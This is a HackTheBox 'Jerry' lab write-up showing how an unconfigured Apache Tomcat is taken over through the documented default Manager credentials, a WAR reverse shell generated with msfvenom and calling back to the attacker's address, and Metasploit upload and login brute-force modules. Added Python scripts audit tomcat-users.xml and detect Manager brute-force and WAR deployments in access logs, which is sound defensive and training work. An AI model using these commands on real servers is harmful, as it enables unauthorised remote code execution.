Jerry — HackTheBox writeup

TheNguen
4 min read · Oct 7, 2020


Another machine from the Mayor’s and TJnull’s OSCP list. This is an easy one which can be done in two different ways and we will take a look at both.

Let’s scan the IP we have with nmap to enumerate the ports and services.

sudo nmap -sS -sC -sV -oA jerry 10.10.10.95

We have port 8080 open and it’s running Apache Tomcat.

Browsing to the port shows the default landing page, including the stock message: “If you’re seeing this, you’ve successfully installed Tomcat. Congratulations!”. This suggests a fresh, largely unconfigured install.

Choosing “Server Status”, “Manager App” or “Host Manager” brings up a basic-auth login popup; cancelling it lands you on Tomcat’s 401 error page, which includes an example tomcat-users.xml entry for the manager role.

On this box the example entry holds the working credentials: tomcat:s3cret

And you get logged in.
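The root cause here is an example credential pair from Tomcat’s own documentation left in tomcat-users.xml with a manager role. The following script is an added example (not part of this writeup) that audits a tomcat-users.xml for accounts holding manager or admin roles and flags the documentation example pair and short passwords; it assumes the standard tomcat-users.xml layout, the sample config and the 12-character length threshold are constructed for illustration.

```python
"""Audit tomcat-users.xml for privileged accounts with weak or example passwords.

Added example, not from the writeup. Assumptions: the file follows the
standard tomcat-users.xml layout shipped with Apache Tomcat; the only
'example' pair checked is tomcat/s3cret, which appears in Tomcat's own
documentation and 401 page; the length threshold is illustrative.
"""
import xml.etree.ElementTree as ET

# Roles that grant control over deployments or server configuration.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Credentials copied verbatim from Tomcat's documentation / 401 page.
EXAMPLE_CREDENTIALS = {("tomcat", "s3cret")}

MIN_PASSWORD_LENGTH = 12  # illustrative threshold

# Constructed sample config resembling a fresh install with the
# documentation example pasted in unchanged.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="k7Vb2wPq9zLm4Rt" roles="manager-script"/>
  <user username="viewer" password="s3cret" roles="probe"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text):
    """Return (username, finding) tuples for privileged accounts at risk."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Match '{namespace}user' as well as a bare 'user' tag.
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # unprivileged accounts are out of scope here
        role_list = ",".join(sorted(privileged))
        if (name, password) in EXAMPLE_CREDENTIALS:
            findings.append((name, f"documentation example credentials with role(s) {role_list}"))
        elif len(password) < MIN_PASSWORD_LENGTH:
            findings.append((name, f"password shorter than {MIN_PASSWORD_LENGTH} with role(s) {role_list}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {finding}")
```

Only accounts that actually carry a manager or admin role are reported, because those are the ones that can deploy code. Beyond the password itself, current Tomcat releases ship the Manager app with a RemoteAddrValve in its META-INF/context.xml that restricts it to localhost; exposing the Manager app on all interfaces, as this box does, is the second thing an audit should flag.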

There is an option to deploy WAR files.

Generate a WAR payload with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=9001 -f war > shell.war

Once that’s done you can select your shell and deploy it.

When it’s uploaded you will see it in the list of applications.

Reload it, fire up a netcat listener and then navigate to /shell.

You should receive a connection as NT AUTHORITY\SYSTEM.

Navigating to the Administrator folder we see a “flags” directory.

We get two flags at the price of one ¯\_(ツ)_/¯

You can also go through the box with Metasploit. Start it:

msfconsole

And search for “tomcat”.

Among the results is the authenticated upload code execution module (exploit/multi/http/tomcat_mgr_upload). Select it and set the options.

I set the HttpPassword, HttpUsername, RHOSTS and RPORT. Run it and you should get a Meterpreter session.

From there we can drop into a shell, which runs as Administrator.

If you did not try to log in to the manager page to find the credentials, there is a Metasploit module that would have found the username and password: auxiliary/scanner/http/tomcat_mgr_login. Select it and set the options; in this case only the target IP is needed.

Running the module brute-forces the Manager login page.

Eventually it will find the password.
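Both routes through this box leave a clear trail in Tomcat’s access log: a burst of 401 responses on /manager from one source during the brute force, followed by an authenticated POST to the upload endpoint when the WAR is deployed. The script below is an added example (not from this writeup) that flags both patterns over a few constructed log lines. It assumes the default AccessLogValve pattern (common log format); the threshold, window and sample lines are constructed for illustration.

```python
"""Flag Tomcat Manager brute-force bursts and WAR deployments in access logs.

Added example, not part of the writeup. Assumptions: the log uses Tomcat's
default AccessLogValve pattern ('%h %l %u %t "%r" %s %b'); the threshold and
window are illustrative; the sample log is constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that create or replace a web application.
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

# Constructed sample: failed logins from one host, a success, an upload,
# then the first request to the freshly deployed context.
SAMPLE_LOG = """\
10.10.14.5 - - [07/Oct/2020:12:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [07/Oct/2020:12:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [07/Oct/2020:12:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.9 - - [07/Oct/2020:12:00:06 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [07/Oct/2020:12:00:07 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [07/Oct/2020:12:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [07/Oct/2020:12:00:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [07/Oct/2020:12:00:20 +0000] "GET /manager/html HTTP/1.1" 200 11873
10.10.14.5 - tomcat [07/Oct/2020:12:00:45 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=A1B2C3D4 HTTP/1.1" 303 -
10.10.14.5 - - [07/Oct/2020:12:00:50 +0000] "GET /shell/ HTTP/1.1" 200 -
10.10.14.9 - - [07/Oct/2020:12:01:30 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""


def parse_log(text):
    """Parse common-log-format lines into dicts; non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def manager_bruteforce_sources(entries, threshold=5, window_seconds=60):
    """IPs with at least `threshold` 401s on /manager inside any sliding window."""
    recent = defaultdict(deque)  # ip -> timestamps of recent 401s
    flagged = set()
    for e in sorted(entries, key=lambda x: x["ts"]):
        if e["status"] != 401 or not e["path"].startswith("/manager"):
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while (e["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that fell out of the window
        if len(q) >= threshold:
            flagged.add(e["ip"])
    return sorted(flagged)


def manager_deployments(entries):
    """Successful POST/PUT requests to a Manager deploy endpoint."""
    hits = []
    for e in entries:
        path = e["path"].split("?", 1)[0]  # strip the CSRF nonce query string
        if e["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PREFIXES) and e["status"] < 400:
            hits.append({"ip": e["ip"], "user": e["user"], "ts": e["ts"], "path": path})
    return hits


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for ip in manager_bruteforce_sources(entries):
        print("possible Manager brute force from", ip)
    for h in manager_deployments(entries):
        print(f"deployment by {h['user']} from {h['ip']} at {h['ts']:%H:%M:%S} via {h['path']}")
```

A deployment through the Manager app is rare enough on most servers that every hit from manager_deployments is worth a ticket on its own; the brute-force check is the noisier of the two and wants a threshold tuned to how often legitimate admins mistype the password.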

That was pretty much it for Jerry. I hope you enjoyed the machine and the writeup. Cya around.
